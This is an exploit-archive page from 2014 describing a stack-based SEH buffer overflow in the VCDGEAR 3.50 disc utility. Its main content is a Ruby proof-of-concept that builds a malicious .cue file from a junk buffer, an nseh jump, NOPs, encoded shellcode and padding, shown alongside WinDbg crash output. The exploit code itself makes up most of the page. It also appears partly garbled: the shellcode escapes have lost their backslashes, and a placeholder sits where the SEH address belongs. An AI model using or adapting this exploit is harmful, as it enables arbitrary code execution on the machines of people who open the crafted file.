Home / exploitsPDF  

VCDGEAR 3.50 Stack Buffer Overflow

Posted on 01 March 2014

# Author: Provensec www.provensec.com <advisories@provensec.com >
# Tested on XP SP3 / Windows 7

# Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow
vulnerability because the application fails to perform adequate
boundary-checks on user-supplied input.
# An attacker can exploit this issue to execute arbitrary code in the
context of the application. Failed exploit attempts will result in a
denial-of-service condition.
# Application vendor: VCDGear 3.50 -
http://www.vcdgear.com/files/vcdgear350.zip

# 0x00499a1e : pop ecx # pop ebp # ret 0x0c | startnull {PAGE_EXECUTE_READ}
[vcdgear.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
# SEH record (nseh field) at 0x0012f7a4 overwritten with normal pattern :
0x35744134 (offset 580), followed by 1416 bytes of cyclic data
# Project1!ScandataFinalize+0x441:
# 00452ff9 c6841553fdffff00 mov byte ptr [ebp+edx-2ADh],0
ss:0023:4112f660=??
# 0:000> !exchain
# 0012f7a4: 44434241
# Invalid exception stack at 909006eb
# 0:000> !exploitable
# *** ERROR: Symbol file could not be found. Defaulted to export symbols
for C:WINDOWSsystem32USER32.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols
for C:WINDOWSsystem32kernel32.dll -
# Exploitability Classification: EXPLOITABLE

shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xa4" +
"x0dx2bxbax83xebxfcxe2xf4x58xe5x6fxbaxa4x0dxa0xff" +
"x98x86x57xbfxdcx0cxc4x31xebx15xa0xe5x84x0cxc0xf3" +
"x2fx39xa0xbbx4ax3cxebx23x08x89xebxcexa3xccxe1xb7" +
"xa5xcfxc0x4ex9fx59x0fxbexd1xe8xa0xe5x80x0cxc0xdc" +
"x2fx01x60x31xfbx11x2ax51x2fx11xa0xbbx4fx84x77x9e" +
"xa0xcex1ax7axc0x86x6bx8ax21xcdx53xb6x2fx4dx27x31" +
"xd4x11x86x31xccx05xc0xb3x2fx8dx9bxbaxa4x0dxa0xd2" +
"x98x52x1ax4cxc4x5bxa2x42x27xcdx50xeaxccxfdxa1xbe" +
"xfbx65xb3x44x2ex03x7cx45x43x6ex4axd6xc7x0dx2bxba"

filename = "file.cue"
header = " BINARY
"
header += " TRACK 01 MODE22352
"
header += " INDEX 01 00:00:00
"

nops = "x90" * 20
junk = "x41" * 324
nseh = "xebx06x90x90"
seh = "x1ex9ax49x00"
padding = "D" * (1412-(nops.length+shellcode.length))

data = "FILE "" + junk + nseh + "ABCD" + nops + shellcode + padding + """
+ header

puts "[*] JUNK size: %i
" % [junk.length]
puts "[*] SHELLCODE size: %i
" % [shellcode.length]
puts "[*] PADDING size: %i" % [padding.length]

File.open(filename, 'wb') do |fd|
 fd.write data
 puts "[*] FILE CREATED SUCCESSFULLY"
end

 

TOP

Malware :

Exploits :